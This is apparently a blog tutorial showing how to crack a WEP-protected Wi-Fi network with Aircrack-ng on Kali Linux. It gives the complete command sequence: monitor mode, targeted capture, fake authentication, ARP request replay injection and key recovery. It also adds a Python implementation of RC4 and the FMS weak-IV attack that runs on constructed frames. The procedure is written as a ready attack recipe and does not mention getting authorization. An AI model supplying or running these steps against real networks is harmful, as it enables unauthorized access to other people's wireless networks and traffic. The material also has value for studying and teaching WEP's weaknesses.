
The Aircrack-ng suite consists of many tools, such as aircrack-ng, airdecap-ng, aireplay-ng, packetforge-ng, airodump-ng and others, used to audit the Wi-Fi networks around us and recover their keys.
For this we need Wi-Fi hardware whose driver supports packet injection and monitor mode. Some adapters that do:
- Alfa card by Alfa Networks
- TP-Link TL-WN821N
- Edimax EW-7811 UTC AC600
and so on.
In this tutorial we use an Alfa card; on the Kali Linux distro these usually need no driver installation, just plug and play.
Let's start by checking whether Kali Linux has detected our card. To do that, type the following command in a terminal window:
airmon-ng
The screenshot of the command is the following:
Next, we put our Wi-Fi adapter (the Alfa card in our case) into monitor mode. The card shows up as wlan0 here; airmon-ng creates a new monitor-mode interface named wlan0mon, and that is the interface name used in every later command. If airmon-ng warns about processes that could interfere (NetworkManager, wpa_supplicant), run airmon-ng check kill first.
airmon-ng start wlan0
The screenshot of the above command is the following:
Now we will check for Wi-Fi networks around us by using this command:
airodump-ng wlan0mon
The screenshot of the preceding command is the following:
Then we note the BSSID (the MAC address in the BSSID column) of the network we want to crack and its channel (the CH column). The ESSID column, the network's name, tells us which row is our target, and the ENC column must say WEP, since this attack only works against WEP.
In our case the BSSID is B8:C1:A2:07:BC:F1 and the channel is 9.
Then we stop the scan by pressing Ctrl+C and leave the terminal window open.
In a second terminal window we capture only our target's traffic, locking the card to its channel, and use the -w switch to write the packets to a file (with -w packets the files are named packets-01.cap, packets-01.csv and so on in the current directory):
airodump-ng -w packets -c 9 --bssid B8:C1:A2:07:BC:F1 wlan0mon
The screenshot follows:
Now we watch the #Beacons and #Data columns. Both start at 0 and grow as frames pass between the router and its connected devices, but only data frames carry an IV, so #Data is the number that matters. With its default PTW attack, aircrack-ng needs roughly 20,000 data packets to crack a 64-bit WEP (Wired Equivalent Privacy) key and more for a 128-bit key, which takes far too long on a quiet network.
To speed this up, we open another terminal window and perform a fake authentication, so that the access point accepts frames sent from our card:
aireplay-ng -1 0 -e MGMNT -a B8:C1:A2:07:BC:F1 -h 00:c0:ca:57:cd:fc wlan0mon
Here -1 0 selects fake authentication with a re-association delay of 0 seconds. After -e we type the AP's ESSID (MGMNT here), after -a the AP's MAC address (the BSSID noted above) and after -h the MAC address of our own card. The -h value must be the card's real address (check it with macchanger --show wlan0mon or ip link), otherwise the AP never acknowledges our frames.
The screenshot follows:
Now we generate traffic with the ARP request replay attack. aireplay-ng waits for an ARP request on the network and re-injects it over and over; every reply the AP sends is encrypted with a fresh IV, so the #Data counter in the airodump-ng window climbs quickly:
aireplay-ng -3 -b B8:C1:A2:07:BC:F1 -h 00:c0:ca:57:cd:fc wlan0mon
Here -b is the target BSSID and -h is again our card's MAC address, which must match the one used for the fake authentication. The following screenshot shows an example of the applied command:
Once enough packets are saved in the capture file, we start aircrack-ng on it. The -w packets option above produced packets-01.cap, and -b restricts the attack to our target BSSID:
aircrack-ng -b B8:C1:A2:07:BC:F1 packets-01.cap
The following screenshot shows the output of the preceding command:
aircrack-ng can be started while airodump-ng is still capturing: if there are not yet enough IVs it reports the failure and automatically retries as new packets are written to the file. When the key is recovered it prints KEY FOUND! with the key in hex and, if it decodes to printable characters, in ASCII as well; that is the Wi-Fi password.
This is why we need to capture as many packets as possible. WEP encrypts every data frame with RC4, keyed by the frame's 3-byte (24-bit) Initialization Vector (IV), which is sent in the clear, prepended to the secret key. Because only 2^24 IVs exist, they repeat on a busy network, and weaknesses in RC4's key scheduling (the FMS and KoreK attacks, and the newer PTW attack aircrack-ng uses by default) let statistics over many IVs, combined with the known first plaintext bytes of ARP frames, recover the key one byte at a time. So the job is simply to capture as many distinct IVs as we can and then run aircrack-ng on them.
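To make concrete why more IVs mean a faster crack, here is an added example that is not part of the original post and not aircrack-ng's code: a toy implementation of RC4, WEP frame encryption and the FMS weak-IV attack (the older attack behind aircrack-ng's -K mode; PTW, the default, uses a different statistic but the same idea of voting over many IVs). It assumes a constructed 40-bit key, a constructed capture of ARP-like frames whose IVs are the classic weak form (A+3, 255, X), and it leaves out WEP's 4-byte ICV, which the attack does not use. Every frame starts with the fixed LLC/SNAP header of an ARP packet, which is exactly why ARP replay is such a good source of usable IVs: the first keystream byte of every frame is known.

```python
"""
Toy FMS weak-IV attack on WEP (added example; not aircrack-ng's code).

WEP seeds RC4 with IV || secret key, the 3-byte IV being sent in the clear.
Every ARP frame starts with the LLC/SNAP header AA AA 03 00 00 00 08 06, so
the first keystream byte of each captured frame is known.  For weak IVs of
the form (A+3, 255, X) that byte leaks secret key byte A with roughly 5%
probability; voting over many such frames recovers the key byte by byte.
All frames below are constructed, not captured.
"""
from collections import Counter

N = 256
SNAP_ARP = bytes.fromhex("aaaa030000000806")  # known first plaintext bytes of any ARP frame


def rc4_ksa(key):
    """RC4 key scheduling: the permutation S for the given key bytes."""
    S = list(range(N))
    j = 0
    for i in range(N):
        j = (j + S[i] + key[i % len(key)]) % N
        S[i], S[j] = S[j], S[i]
    return S


def rc4_keystream(key, n):
    """First n keystream bytes of RC4 for the given key."""
    S = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) % N
        j = (j + S[i]) % N
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) % N])
    return bytes(out)


def wep_encrypt(iv, secret, plaintext):
    """WEP frame body: clear-text IV, then plaintext XOR RC4(IV || secret).
    The CRC-32 ICV that real WEP appends is omitted; the attack does not need it."""
    ks = rc4_keystream(iv + secret, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def constructed_capture(secret):
    """Constructed stand-in for packets-01.cap: one ARP-like frame per weak IV
    (A+3, 255, X), i.e. 256 frames per key byte, as ARP replay would produce."""
    payload = SNAP_ARP + bytes(20)  # the rest of the ARP body is irrelevant here
    return [wep_encrypt(bytes([a + 3, 255, x]), secret, payload)
            for a in range(len(secret)) for x in range(N)]


def fms_votes(frames, known):
    """Votes for secret key byte index len(known), given the recovered prefix."""
    a = len(known)
    votes = Counter()
    for frame in frames:
        key = list(frame[:3]) + list(known)  # IV || recovered key bytes
        S, j = list(range(N)), 0
        for i in range(a + 3):               # replay the KSA steps we can compute
            j = (j + S[i] + key[i]) % N
            S[i], S[j] = S[j], S[i]
        if S[1] >= a + 3 or (S[1] + S[S[1]]) % N != a + 3:
            continue                         # KSA not in the "resolved" state for this IV
        out = frame[3] ^ SNAP_ARP[0]         # first keystream byte via the known plaintext
        # With ~5% probability the next KSA step moves S[j'] into S[a+3] and it survives
        # to become the first output byte; then j' = S^-1[out] and K[a+3] = j' - j - S[a+3].
        votes[(S.index(out) - j - S[a + 3]) % N] += 1
    return votes


def key_matches(frame, secret):
    """Verify a candidate key against one frame's known plaintext (the SNAP header)."""
    ks = rc4_keystream(frame[:3] + secret, len(SNAP_ARP))
    return bytes(c ^ k for c, k in zip(frame[3:], ks)) == SNAP_ARP


def recover_key(frames, key_len=5, width=5):
    """Depth-first search over the top-`width` vote winners for each byte, checking full
    candidates against a frame (the same idea as aircrack-ng's fudge factor)."""
    def search(prefix):
        if len(prefix) == key_len:
            return prefix if key_matches(frames[0], prefix) else None
        for cand, _ in fms_votes(frames, prefix).most_common(width):
            found = search(prefix + bytes([cand]))
            if found is not None:
                return found
        return None
    return search(b"")


if __name__ == "__main__":
    SECRET = bytes.fromhex("1f2a3b4c5d")  # constructed 40-bit (64-bit WEP) key
    frames = constructed_capture(SECRET)
    print("expected:", SECRET.hex(), "recovered:", recover_key(frames).hex())
```

Each key byte gets only 256 weak IVs of this form, and each of them leaks the byte with about 5% probability, so a dozen or so correct votes have to stand out against the noise; that is the whole reason the real attack wants tens of thousands of captured IVs, and why the ARP replay step is what makes the crack practical.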
Feel free to leave a comment below or reach me on Instagram @iamshubhamkumar__.